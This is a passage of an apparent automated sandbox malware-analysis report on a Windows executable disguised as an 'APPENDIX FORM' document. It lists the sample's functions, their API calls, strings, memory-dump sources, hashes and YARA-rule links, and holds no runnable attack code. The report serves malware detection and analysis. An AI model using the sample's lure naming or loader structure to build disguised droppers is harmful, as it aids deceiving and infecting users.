                                                                                                              • Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
                                                                                                              Function 00405A18 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrcpyA.KERNEL32(00421A70,NUL,?,00000000,?,00000000,?,00405BBC,?,?,?,0040575F,?,00000000,000000F1,?), ref: 00405A28
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00405BBC,?,?,?,0040575F,?,00000000,000000F1,?), ref: 00405A4C
                                                                                                              • GetShortPathNameA.KERNEL32(00000000,00421A70,00000400), ref: 00405A55
                                                                                                                • Part of subcall function 004058D6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 004058E6
                                                                                                                • Part of subcall function 004058D6: lstrlenA.KERNEL32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 00405918
                                                                                                              • GetShortPathNameA.KERNEL32(?,00421E70,00000400), ref: 00405A72
                                                                                                              • wsprintfA.USER32 ref: 00405A90
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00421E70,C0000000,00000004,00421E70,?,?,?,?,?), ref: 00405ACB
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405ADA
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B12
                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421670,00000000,-0000000A,00409384,00000000,[Rename],00000000,00000000,00000000), ref: 00405B68
                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B7A
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405B81
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405B88
                                                                                                                • Part of subcall function 00405971: GetFileAttributesA.KERNELBASE(?,00402CBE,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 00405975
                                                                                                                • Part of subcall function 00405971: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405997
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                              • String ID: %s=%s$NUL$[Rename]
                                                                                                              • API String ID: 1265525490-4148678300
                                                                                                              • Opcode ID: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                                                                              • Instruction ID: b5c81c1859d8f1192d2ecd791256e289f06fc5ca0860dc0d9e47344a35b8d296
                                                                                                              • Opcode Fuzzy Hash: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                                                                              • Instruction Fuzzy Hash: 2F41CE71604B19BFD2206B615C49F7B3A6CEB45764F14013AFD05B62D2EA7CB8018E7E
                                                                                                              Function 100023D6 Relevance: 15.1, APIs: 10, Instructions: 132memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • wsprintfA.USER32 ref: 1000243B
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002453
                                                                                                              • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002464
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002479
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10002480
                                                                                                                • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                                                                                              • GlobalFree.KERNEL32(?), ref: 100024F7
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10002520
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2278267121-0
                                                                                                              • Opcode ID: 81b508f8566c72cb6bbb7f925887647fde0818022af9d0756ca2701a40b1599b
                                                                                                              • Instruction ID: 4bda31b1a44bf33176999a02eb948954730f0d1b170e125cf388d9069a493b86
                                                                                                              • Opcode Fuzzy Hash: 81b508f8566c72cb6bbb7f925887647fde0818022af9d0756ca2701a40b1599b
                                                                                                              • Instruction Fuzzy Hash: 9841BFB1209616EFFB51CFA4CCC8E2BBBECFB042D57124529FA5592168CB31AC50DB25
                                                                                                              Function 10002218 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136memorystringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(?), ref: 100022CD
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 100022F7
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1000230C
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 1000231B
                                                                                                              • CLSIDFromString.OLE32(00000000,00000000), ref: 10002328
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 1000232F
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10002366
                                                                                                                • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                                                                              • String ID: @H3w
                                                                                                              • API String ID: 3955009414-4275297014
                                                                                                              • Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                                                                                              • Instruction ID: d69edb42b16e9a526c81b887825c6d31ceffefc99351cdbd06d67dbb68f1f7db
                                                                                                              • Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                                                                                              • Instruction Fuzzy Hash: FC417C71509301EFF760DF648888B6AB7FCFB443D1F218929F946D6199DB34AA40CB61
                                                                                                              Function 00405F4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FA3
                                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
                                                                                                              • CharNextA.USER32(?,"C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FB5
                                                                                                              • CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031F1,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033CB), ref: 00405FC5
                                                                                                              Strings
                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F4C, 00405F51
                                                                                                              • "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe", xrefs: 00405F87
                                                                                                              • *?|<>/":, xrefs: 00405F93
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                              • API String ID: 589700163-35069653
                                                                                                              • Opcode ID: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                                                                              • Instruction ID: b0dad545636566696c56c87c00777fa542562a183f3785fc597fb34056e0d2ab
                                                                                                              • Opcode Fuzzy Hash: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                                                                              • Instruction Fuzzy Hash: 08110161808B9269FB3216340C44B7BBF99CF5A760F28007BE9C0732C2D77C5C429A6D
                                                                                                              Function 00404035 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 00404052
                                                                                                              • GetSysColor.USER32(00000000), ref: 0040406E
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040407A
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404086
                                                                                                              • GetSysColor.USER32(?), ref: 00404099
                                                                                                              • SetBkColor.GDI32(?,?), ref: 004040A9
                                                                                                              • DeleteObject.GDI32(?), ref: 004040C3
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004040CD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                              • Instruction ID: aac8be200c2a37c7c3a3d9d61c48e2962f0c237efd7738e790c95123d26b84df
                                                                                                              • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                              • Instruction Fuzzy Hash: 732184B19047049BC7319F68DD08B4BBBF8AF41714F048A29EA95F22E1D738E944CB55
                                                                                                              Function 00402685 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004026D9
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004026F5
                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040272E
                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402740
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402747
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040275F
                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402773
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3294113728-0
                                                                                                              • Opcode ID: 04ef34068c3d6b2ff7b9b68edd005d6889665b3502cfa23757ba6eeec6e6e302
                                                                                                              • Instruction ID: 61f3ed29154f776cadf79894fffc4e7c3199e3b8836c730970b54a9edadab088
                                                                                                              • Opcode Fuzzy Hash: 04ef34068c3d6b2ff7b9b68edd005d6889665b3502cfa23757ba6eeec6e6e302
                                                                                                              • Instruction Fuzzy Hash: 23318D71C00128BBDF216FA5DD49D9E7A79EF09364F10422AF5207A2E1C7794C419BA9
                                                                                                              Function 00404FCB Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                              • lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                              • lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                              • SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                                                                              • Instruction ID: 5a4c84274bcf923500a8bde6a880dece6f7157f711da0bf1dba54453946cb231
                                                                                                              • Opcode Fuzzy Hash: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                                                                              • Instruction Fuzzy Hash: 40218C71900508BBDB119FA5CD84ADFBFA9EF04354F04807AF948A6290C3798E819FA8
                                                                                                              Function 00402BDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402BF4
                                                                                                              • GetTickCount.KERNEL32 ref: 00402C12
                                                                                                              • wsprintfA.USER32 ref: 00402C40
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B44,00000000), ref: 00402C64
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C72
                                                                                                                • Part of subcall function 00402BC0: MulDiv.KERNEL32(00000000,00000064,00296833), ref: 00402BD5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: f2267b28db3a5fe3cb10dbc160883a1cbec363296c6093f2343f828124788bd0
                                                                                                              • Instruction ID: d07fb7ba5d8a9df6441e3fcaec0217ab1422bd56783a7a7703193e57ef262099
                                                                                                              • Opcode Fuzzy Hash: f2267b28db3a5fe3cb10dbc160883a1cbec363296c6093f2343f828124788bd0
                                                                                                              • Instruction Fuzzy Hash: C901C870946210ABE721AF64AF0DFAE7778A7017057044237F601B11E0C6B8E541D69E
                                                                                                              Function 00404896 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048B1
                                                                                                              • GetMessagePos.USER32 ref: 004048B9
                                                                                                              • ScreenToClient.USER32(?,?), ref: 004048D3
                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048E5
                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040490B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                              • Instruction ID: db44c4f697662905fd107a60ff49d2a7fca4051012713ef620924bffaa5b50c0
                                                                                                              • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                              • Instruction Fuzzy Hash: 97014C75D00218BAEB01DBA4DC85BFFBBBCAB55711F10412BBB10B62D0C7B4A9418BA5
                                                                                                              Function 00402B44 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B5F
                                                                                                              • wsprintfA.USER32 ref: 00402B93
                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402BA3
                                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
